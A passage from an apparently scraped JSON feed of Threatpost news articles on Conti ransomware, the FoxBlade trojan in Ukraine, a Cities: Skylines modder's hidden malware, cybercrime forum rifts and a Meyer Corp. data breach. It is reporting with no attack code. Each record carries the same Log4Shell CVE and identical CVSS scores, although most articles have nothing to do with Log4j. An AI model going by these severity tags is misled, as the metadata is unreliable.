published, Marco got a phone call from Russia: a first for him, he said. Either Conti\u2019s a fan of BreachQuest\u2019s research, it was a wrong number, or hey, who knows? Maybe its HR team is expanding its outreach.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/14174903/Russia_calling_Marco-e1647294557940.jpg>)\n\nMarco got a call from Russia. He didn\u2019t answer. Source: Threatpost screen capture.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/031122_Marco_Figueroa_BreachQuest_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s[ podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-14T21:50:45", "type": "threatpost", "title": "Staff Think Conti Group Is a Legit Employer \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-14T21:50:45", "id": "THREATPOST:BA0FA5036C385C822C787514850A67E5", "href": "https://threatpost.com/staff-think-conti-group-legit-employer-podcast/178903/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-01T16:59:59", "description": "\u201cAs tanks rolled into Ukraine, so did malware,\u201d [summarized](<https://twitter.com/andreasharsono/status/1498631557392715777>) humanitarian author Andreas Harsono, referring to the [novel malware](<https://blogs.microsoft.com/on-the-issues/2022/02/28/ukraine-russia-digital-war-cyberattacks/>) that Microsoft has named FoxBlade.\n\nOn Monday, the company reported that its Threat Intelligence Center (MSTIC) had detected cyberattacks launched against Ukraine\u2019s digital infrastructure hours before Russia\u2019s tanks and missiles began to pummel the country on Thursday.\n\n\u201cSeveral hours before the launch of missiles or movement of tanks on February 24, Microsoft\u2019s Threat Intelligence Center (MSTIC) detected a new round of offensive and destructive cyberattacks directed against Ukraine\u2019s digital infrastructure,\u201d Microsoft President and Vice-Chair Brad Smith [said](<https://blogs.microsoft.com/on-the-issues/2022/02/28/ukraine-russia-digital-war-cyberattacks/>).\n\n\u201cWe immediately advised the Ukrainian government about the situation, including our identification of the use of a new malware package (which we denominated FoxBlade), and provided technical advice on steps to prevent the malware\u2019s success.\u201d\n\nSmith said that within three hours of discovering FoxBlade, Microsoft had added new signatures to its Defender anti-malware service to detect the exploit.\n\n## FoxBlade Specifics\n\nMicrosoft has issued a Security Intelligence [advisory](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=DoS:Win32/FoxBlade.A!dha>) about FoxBlade, which is a novel trojan.\n\nWhile the company shared neither technical specifics nor details about how FoxBlade achieves initial access on targeted machines, the advisory did explain that \u201cThis[ trojan](<https://www.microsoft.com/security/portal/mmpc/shared/glossary.aspx#trojan>) can use your PC for[ distributed denial-of-service (DDoS)](<https://www.microsoft.com/security/portal/mmpc/shared/glossary.aspx##ddos>) attacks without your knowledge.\u201d\n\nSuch attacks [topped thousands](<https://threatpost.com/ddos-attacks-records-q3/176082/>) daily in Q3 and were expected to keep growing, Kaspersky researchers reported in November 2021.\n\nBeyond launching DDoS attacks, FoxBlade also downloads and installs other programs \u2013 including other malware \u2013 onto infected systems, Microsoft [advised](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Win32/FoxBlade.B!dha>).\n\n## \u2018Precisely Targeted\u2019\n\nThe cyberattacks \u2013 which were ongoing as of Monday, Smith said \u2013 have been \u201cprecisely targeted,\u201d unlike the indiscriminate malware splattered in the NotPetya attack. The NotPetya cyberattack [targeted hundreds of firms and hospitals worldwide in 2017](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>), including Ukraine\u2019s power grid.\n\nIn 2020, the U.S. Department of Justice (DOJ) [charged](<https://threatpost.com/doj-charges-6-sandworm-apt-members-in-notpetya-cyberattacks/160304/>) six Russian nationals for their alleged part in the Ukraine and other cyberattacks.\n\nRegardless of the targeted nature of the current cyberattacks on Ukraine, Smith said Microsoft is still \u201cespecially concerned\u201d about recent cyberattacks aimed at Ukrainian civilian digital targets that have been more wide-ranging, including those fired at the financial sector, agriculture sector, emergency response services, humanitarian aid efforts, and energy sector organizations and enterprises.\n\n\u201cThese attacks on civilian targets raise serious concerns under the Geneva Convention, and we have shared information with the Ukrainian government about each of them,\u201d Smith said.\n\nMicrosoft has also advised the Ukrainian government about recent cyber efforts to steal a range of personally identifiable information (PII), including PII related to health, insurance, transportation and other government data.\n\nMicrosoft has also passed on threat intelligence and defensive strategies to Ukraine\u2019s government so that it could better defend against attacks on military institutions and manufacturers and several other Ukrainian government agencies.\n\n\u201cThis work is ongoing,\u201d Smith said.\n\n## The Ongoing Cyberwar\n\nMicrosoft\u2019s news about FoxBlade comes as just one of a continuing barrage of cyber assaults targeting both Ukraine and Russia: a barrage that\u2019s included the Conti ransomware gang proclaiming that it\u2019s pro-Russia. Last week, it, the extortionists [blared](<https://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad.onion.ly/>) out a warning on their blog, threatening to use Conti\u2019s \u201cfull capacity\u201d to retaliate in the face of \u201cWestern warmongers attempt to target critical infrastructure in Russia or any Russian-speaking region of the world.\u201d\n\nA pro-Ukraine Conti ransomware gang member subsequently [spilled](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) 13 months of the ransomware group\u2019s chats, promising more still to come.\n\nAs well, [ESET](<https://twitter.com/ESETresearch/status/1496581903205511181>) and Broadcom\u2019s[ Symantec](<https://twitter.com/threatintel/status/1496578746014437376>) last week said that they had discovered a new data wiper malware dubbed [**HermeticWiper**](<https://twitter.com/juanandres_gs/status/1496581710368358400>), that\u2019s been used against hundreds of machines in Ukraine. One of the malware samples was compiled back on Dec. 28, pointing to the attacks having been readied two months ago.\n\nThen, on Jan. 13, ** **a destructive wiper malware \u2013 posing as ransomware attacks \u2013 named WhisperGate began to [target](<https://threatpost.com/destructive-wiper-ukraine/177768/>) Ukrainian organizations: an attack that analysts said was likely part of Russia\u2019s wider effort to undermine Ukraine\u2019s sovereignty.\n\nAs well, in mid-February, institutions central to Ukraine\u2019s military and economy \u2013 including government and banking websites \u2013 were slammed with a [wave](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) of DDoS attacks.\n\n## CISA\u2019s Take-Shelter Advice\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA)[ last week warned](<https://www.cisa.gov/uscert/shields-technical-guidance>) that such attacks could spill over Ukraine\u2019s borders.\n\n\u201cDestructive malware can present a direct threat to an organization\u2019s daily operations, impacting the availability of critical assets and data,\u201d CISA[ said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-057a>). \u201cFurther disruptive cyberattacks against organizations in Ukraine are likely to occur and may unintentionally spill over to organizations in other countries.\u201d\n\nOther threats related to the Ukraine/Russia crisis include the typical swarm of threat actors who jump into the fray to exploit the day\u2019s headlines, which, in this situation, convey the haze and confusion of war. Case in point: Malwarebytes has uncovered a spate of [malicious email](<https://threatpost.com/microsoft-accounts-targeted-russian-credential-harvesting/178698/>) bearing the subject line \u201cMicrosoft account unusual sign-in activity.\u201d\n\nCISA provided this list of \u201cImmediate Shields Up Actions\u201d to protect against this wide range of cyber threats:\n\n * Patch[ vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n * Use[ MFA](<https://us-cert.cisa.gov/ncas/tips/ST05-012>).\n * Run antivirus.\n * Enable strong spam filters to prevent phishing emails from reaching end users.\n * Disable ports and protocols that are not essential.\n * Strengthen[ controls for cloud services](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar21-013a>).\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-01T16:55:47", "type": "threatpost", "title": "Ukraine Hit with Novel 'FoxBlade' Trojan Hours Before Invasion", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-01T16:55:47", "id": "THREATPOST:503327A6AB0C76621D741E281ABCFF77", "href": "https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-14T17:51:33", "description": "The developer of several popular mods for the Cities: Skylines city-building game has been banned after malware was discovered hidden in their wares.\n\nThe modder, who goes by the handle Chaos as well as Holy Water, reportedly tucked an automatic updater into several mods that enabled the author to deliver malware to anybody who downloaded them.\n\nIt started last year, when Chaos launched a \u201credesigned\u201d version of Harmony: a core framework project that most Cities: Skylines mods rely on to work. The author went on to similarly rework other popular mods, and he listed his Harmony redo as a core download: in other words, players would be forced to download it to get dependent mods to work.\n\nBut an automatic updater was subsequently discovered, hidden away in Chao\u2019s Harmony version \u2013 an updater that enabled the modder to deliver malware to the devices of those who downloaded it. As well, the author reportedly poisoned other mods with malicious code that bogged down game-play, forcing players to download yet more tainted mods that Chaos had created as \u201csolutions.\u201d\n\nAccording to a pinned post on the [Cities: Skylines subreddit](<https://old.reddit.com/r/CitiesSkylines/>), some, but not all, of Chaos\u2019 mods have been removed from the Steam Workshop, and the author\u2019s accounts have been suspended.\n\n## Players Urged to Trash the Mods\n\nThe subreddit moderator who posted the warning on Saturday \u2013 kjmci \u2013 urged players to scrub their systems of anything published by Chaos.\n\n\u201cWe recommend in the strongest possible terms that you unsubscribe from all items published by this author and do not subscribe, download, or install any mods, from any source, that may be published by this individual in future,\u201d according to the subreddit post.\n\n[Valve](<https://www.nme.com/brands/valve>) has reportedly yanked several of the mods that feed into the automatic updater and has banned Chaos\u2019 most recent accounts. However, as [NME](<https://www.nme.com/news/gaming-news/valve-bans-cities-skylines-modder-after-discovery-of-major-malware-risk-3159709>) reports, the modder\u2019s downloads now number around 35,000, meaning that the devices of tens of thousands of gamers have potentially been infected.\n\nChaos had developed several forks \u2013 i.e., modified and reuploaded versions \u2013 of popular mods from well-known creators, including Harmony, Network Extensions and Traffic Manager: President Edition.\n\n## Poisoning the Code Chain\n\nLacing Harmony with malware is particularly pernicious, given that it\u2019s one of the mods that Chaos \u201credesigned.\u201d Chaos listed the modified version as a core download, as in, a dependency for other mods that players would have to download in order for other dependent mods to work.\n\nAmong other functions, Harmony dishes out a patching library to mods that need it and hot-patches older Harmony versions \u2013 older versions that, according to Steam\u2019s [community page](<https://steamcommunity.com/workshop/filedetails/?id=2040656402>), are still in use by various mods.\n\n\u201cUsers install Harmony (redesigned) for a particular reason, suddenly they get errors in popular mods. The solution provided is to use [Chaos\u2019] versions,\u201d kjmci told NME. \u201cThose versions gain traction and users, and people come across them instead of the originals\u2026 and see Harmony (redesigned) marked as a dependency. Users install Harmony (redesigned) with the [automatic updating code] bundled with it. Suddenly you have tens of thousands of users who have effectively installed a trojan on their computer.\u201d\n\nThe automatic, malware-delivering updater was found buried in Chao\u2019s version of Harmony, according to what kjmci told NME. The moderator opts for anonymity because they\u2019ve been targeted by Chaos in the past, they told the publication.\n\n## Some Mods Rigged with Performance-Slaying Malware\n\nBesides inflicting the trojan on unsuspecting players, Chaos also reportedly planted malicious code that targeted fellow modders and employees of the game\u2019s developer, Colossal Order.\n\nThis particular flavor of malware crippled game performance, according to kjmci. The resulting crummy game-play motivated users to download so-called \u201csolutions\u201d that Chaos advertised to help clear up the issues.\n\nFollowing their fans\u2019 complaints about the sluggish performance, the developers of the targeted mods investigated and discovered the malicious code.\n\n## Chaos Could Return\n\nJust because Valve pulled Chaos\u2019 accounts doesn\u2019t mean the modder won\u2019t be back to spread more malware. As NME notes, a loophole in [the workshop rules](<https://wiki.facepunch.com/gmod/Steam_Workshop_Rules>) for Steam \u2013 Valve\u2019s digital distribution service \u2013 could allow the author to keep working on mods from another account even if his current accounts stay banned.\n\nBesides which, just because Chaos was banned doesn\u2019t mean that the damage is done. It could, in fact, get a lot worse, kjmci said: \u201cWhat\u2019s been implemented would let him cryptolock a bunch of machines, create a botnet (and DDoS his enemies?) or mine cryptocurrency.\u201d\n\nDistributed denial-of-service (DDoS) attacks are far from novel in the gaming world. Last month, for example, a massive Minecraft tournament styled after the Netflix blockbuster Squid Game known as \u201cSquidCraft\u201d was attacked with a DDoS attack that [took down](<https://threatpost.com/cyberattacks-squid-game-minecraft-andorra-internet/177981/>) the sole (and state-owned) internet service provider in Andorra.\n\n## \u2018Classic\u2019 Supply Chain Attack\n\nJohn Bambenek, principal threat hunter at digital IT and security operations company Netenrich, noted that malware in games or in game mods \u2013 or even in pirated/cracked games, for that matter, is a fairly common tactic, \u201cone that often involves American and European actors.\u201d\n\nHe told Threatpost on Monday that using a supply chain tactic to get into more victims is \u201ca fairly new tactic,\u201d but unsurprising, given that \u201cour discussion of the potential massive risks of supply chain attacks have inspired new actors to adopt them.\u201d\n\nCasey Bisson, head of product and developer relations at code and security provider BluBracket, told Threatpost on Monday that this is a \u201cclassic software supply chain attack similar to what we\u2019ve seen elsewhere,,\u201d the difference being how close it gets to the consumer end user.\n\n\u201cThere\u2019s lots of open source and commercially sourced software components that go into the apps and games on our mobile devices, but those supply chains are shorter and less complex relative to the components that can go into the software on servers or network devices,\u201d Bisson said via email. \u201cBut \u2018shorter and less complex\u2019 supply chains are still vulnerable.\n\n\u201cCode is a vast and unprotected attack surface, and there\u2019s no class of software that\u2019s immune from attack. The more consumers feel these attacks on their personal mobile devices, the more they\u2019ll demand protections.\u201d\n\nCompanies can get ahead of consumer demands by implementing automated security practices to ensure product safety, he suggested.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-14T17:23:45", "type": "threatpost", "title": "'Cities: Skylines' Gaming Modder Banned Over Hidden Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-14T17:23:45", "id": "THREATPOST:7DDE7BA7A7916763BDDB5D0C565285DA", "href": "https://threatpost.com/cities-skylines-modder-banned-over-hidden-malware/178403/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-14T14:53:14", "description": "A rift has formed in the cybercrime underground: one that could strengthen, rather than cripple, the cyber-onslaught of ransomware.\n\nAccording to a report ([PDF](<https://acn-marketing-blog.accenture.com/wp-content/uploads/2022/03/UPDATED-ACTI-Global-Incident-Report-Ideological-Divide-Blog-14MARCH22.pdf>)) published Monday, ever since the outbreak of war in Ukraine, \u201cpreviously coexisting, financially motivated threat actors divided along ideological factions.\u201d\n\n\u201cPro-Ukrainian actors are refusing to sell, buy, or collaborate with Russian-aligned actors, and are increasingly attempting to target Russian entities in support of Ukraine,\u201d wrote researchers from Accenture\u2019s Cyber Threat Intelligence (ACTI). \u201cHowever, pro-Russian actors are increasingly aligning with hacktivist-like activity targeting \u2018enemies of Russia,\u2019 especially Western entities due to their claims of Western warmongering.\u201d\n\n## The Russia-Ukraine Cyber Warzone\n\nHistorically, the world\u2019s foremost cybercrime forums have been Russian language. These dark web marketplaces bring together a complex network of advanced persistent threat (APT) and ransomware groups, botmasters, and malware authors \u2013 a range of cybercriminals that includes even low-level carders, scammers and script kiddies.\n\nTogether, threat actors can [do more](<https://threatpost.com/inside-ransomware-economy/166471/>) than they otherwise could on their own. For example, botmasters offer access to already compromised devices, software developers improve the malware, and initial access brokers specialize in providing network access via backdoors or security vulnerability exploits for things like Remote Desktop Protocol (RDP).\n\nThis productivity is underpinned by not only a shared language, but a shared cultural and political alignment. As ACTI noted in its report, \u201cthese forums previously employed a strict, \u2018no work in CIS\u2019 policy.\u201d The CIS \u2013 Commonwealth of Independent States \u2013 is a post-Soviet conglomeration of Russia and central Asian states.\n\nWith the outbreak of war, however, this harmony is fracturing.\n\nOne poll, published to a cross-site scripting (XSS) forum on March 2, posed the question: \u201cAre you against work on RU and CIS?\u201d 82.6 percent of respondents responded \u201cYes,\u201d but, a surprisingly large minority \u2013 17.4 percent \u2013 responded \u201cNo.\u201d\n\n## No Love For Moscow\n\nOn Feb. 27, an admin from RaidForums \u2013 an online marketplace for trafficking data from high-profile database leaks \u2013 published a statement titled \u201cRAIDFORUMS SANCTIONS ON RUSSIA.\u201d\n\n> ANY USER FOUND TO BE CONNECTING FROM RUSSIA WILL BE BANNED! THIS IS NOT A JOKE, WE DO NOT SUPPORT THE KREMLIN.\n\nShortly after the statement was published, RaidForums\u2019 main server was taken down by unknown enemies. It remained down as of March 4, according to ACTI.\n\nThe same is true in the opposite direction. The conflict \u201chas led some actors to exclusively sell their services, such as network accesses, to pro-Russian actors,\u201d researchers wrote, and inspired increased attacks against Western targets.\n\n## How This Will Hurt the West\n\nIt might appear, at first glance, that civil war in the cyber underground is a good thing. After all, if they\u2019re fighting each other they won\u2019t have time to annoy the rest of us, right?\n\nIn fact, the exact opposite is true.\n\n\u201cThe primary effect of this political divide so far,\u201d the researchers observed, \u201cis an increased and prolonged threat from underground actors aimed at Western targets, owed to the galvanization of pro-Russian actors and their targeted efforts that focus on \u2018enemies of Russia.'\u201d\n\nNationalist fervor is even motivating cybercriminals to open their arms and welcome previously shunned ransomware groups.\n\nIn response to the [Colonial Pipeline](<https://threatpost.com/colonial-pays-5m/166147/>) attack last May, Western governments and law enforcement began cracking down harder than ever on ransomware groups. In response \u2013 to avoid getting the stink on them, too \u2013 underground admins banned those groups.\n\n\u201cWhile ransomware actors did not disappear from the underground,\u201d wrote the researchers, \u201cthe ban did make it harder for them to acquire tools, recruit affiliates, or gain exploits or accesses, thereby reducing ransomware actors\u2019 abilities to scale their operations.\u201d\n\nNow, \u201cmany underground actors call for the return of ransomware groups to the mainstream underground.\u201d\n\nThe consequence of bringing ransomware groups back into the fold \u201cwould not only enable those actors to target Western organizations more efficiently but also embolden them, as other underground actors would likely herald ransomware actors\u2019 return and give those ransomware actors perceived moral reason to conduct attacks,\u201d the report concluded.\n\n## Increasingly Targeting Critical Infrastructure\n\nThe report described an increasing volume of attacks against the West, \u201cespecially in the resources, government, media, financial and insurance industries,\u201d the report said. \u201cThe targeting of financial and insurance entities is due to the perception that they are the working arms of Western financial sanctions, whereas the targeting of utilities and resources entities is due to those organizations\u2019 importance as critical national infrastructure.\u201d\n\nCritical infrastructure will be of particular concern, especially if ransomware groups have the political motive \u2013 plus the tools of the rest of the underground community at their disposal.\n\n\u201cOrganizations within telecommunications, IT, government and critical infrastructure are no doubt on a heightened level of security with the current events in the geopolitical environment,\u201d James McQuiggan of KnowBe4 told Threatpost via email, but \u201ccybersecurity is finally becoming an important topic for the government, considering the number of attacks the various agencies have dealt with over the past number of years.\u201d\n\nIf the cyber onslaught in Ukraine extends West, will the United States and the European Union [be ready](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>)?\n\nThe answer to that question may arrive soon.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-14T13:52:37", "type": "threatpost", "title": "Cybercrooks\u2019 Political In-Fighting Threatens the West", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-14T13:52:37", "id": "THREATPOST:3DB85AFFEA9491ACBD8909D0CF5FBAEA", "href": "https://threatpost.com/cybercrooks-political-in-fighting-threatens-the-west/178899/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-22T22:00:14", "description": "Meyer Corp., maker of Farberware and the largest cookware and bakeware distributor in the U.S., has begun notifying 2,747 employees that a cyberattack that occurred on Oct. 25 compromised their personal data.\n\nMeyer filed a notice with the state of Maine [disclosing the breach](<https://apps.web.maine.gov/online/aeviewer/ME/40/722270ba-5507-4ea4-88d7-b14961dc4c2d.shtml>), which it discovered on Dec. 1. And while the report given to the Maine Attorney General doesn\u2019t specifically name the culprit behind the attack, the Conti ransomware group had already announced on its leak site on Nov. 7 it was in possession of the employee data files, according to a report this week on the [cyberattack](<https://www.securityweek.com/cookware-distribution-giant-meyer-discloses-data-breach>).\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\nMeyer, based in Vallejo, Calif., was storing detailed information on its employees, including names, Social-Security numbers, driver\u2019s-license numbers and more, along with their name or other personal identifier. Other information which could now potentially be in the hands of the Conti ransomware operators include drug screening results, immigration information and health and medical information.\n\nThe company didn\u2019t reveal many additional details of the strike, but it\u2019s worth noting that Meyer is just one of many companies breached by Conti\u2019s prolific ransomware operations.\n\n## **Conti\u2019s Prolific Ransomware Operations**\n\n\u201cRansomware groups such as Conti have been a thorn in the side of organizations from almost all industries and around the world,\u201d Erich Kron, security awareness advocate for KnowBe4, told Threatpost. \u201cAttacks such as this one by the Conti group are typically a ransomware type of attack that first steals the data, then encrypts it and holds the decryption key ransom.\u201d\n\nBut even if the company pays the demanded ransom, its employees, partners and customers remain vulnerable to subsequent shakedowns.\n\n\u201cIn addition, the groups generally threaten the victim organization with exposure of the stolen data, which can include customers, employees, financial information or intellectual property, among other things, if they do not pay,\u201d Kron said.\n\nJust this month, KP Snacks, a U.K.-based food giant, was [hit by Conti ransomware](<https://threatpost.com/kp-snacks-crumbs-ransomware-attack/178176/>), causing delays in deliveries across the country.\n\n## **Keeping Conti Out of Your Cloud**\n\nKeeping such sensitive data stored in the cloud is a common practice, but leaves companies vulnerable to attack if not properly secured, Amit Shaked, CEO of Laminar, explained in response to the Meyer breach.\n\n\u201cData is no longer a commodity, it\u2019s a currency \u2014 as this incident represents. Information within an organization\u2019s network is valuable to both businesses and attackers,\u201d Shaked said via email. \u201cThis incident also reminds us that with a majority of the world\u2019s data residing in the cloud, it is imperative that security becomes data-centric and solutions become cloud-native.\u201d\n\nFull integration with the cloud is also critical, Shaked added.\n\n\u201cSolutions need to be completely integrated with the cloud in order to identify potential risks and have a deeper understanding of where the data reside,\u201d he said. \u201cUsing the dual approach of visibility and protection, data protection teams can know for certain which data stores are valuable targets and ensure proper controls, which allows for quicker discovery of any data leakage.\u201d\n\nKeeping ahead of sophisticated groups like Conti [ransomware operators](<https://threatpost.com/lockbit-blackcat-swissport-ransomware-activity/178261/>) requires a clear, risk-based approach, Aaron Sandeen, CEO and co-founder, Cyber Security Works added.\n\n\u201cIdeally, organizations should seek out near real-time vulnerability platforms that can centralize threat data and identify, investigate and rank vulnerabilities based on weaponization \u2013 a more effective approach than waiting for reports to be formalized, interpreted and delegated,\u201d advised Sandeen.\n\nBut beyond technical solutions, Kron added strong security training for employees will also help keep cyberattackers, like Conti, at bay.\n\nBecause groups such as Conti and other bad actors use email phishing as a top method of gaining initial network access, it has never been more critical to foster a strong, good, security culture through security awareness training and regular simulated attacks.\u201d\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a _**[_LIVE roundtable discussion_](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)**_, \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, will focus on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. _**[_REGISTER NOW_](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)**_ and please Tweet us your questions ahead of time @Threatpost so they can be_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-22T20:41:48", "type": "threatpost", "title": "Cyberattackers Cook Up Employee Personal Data Heist for Meyer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, 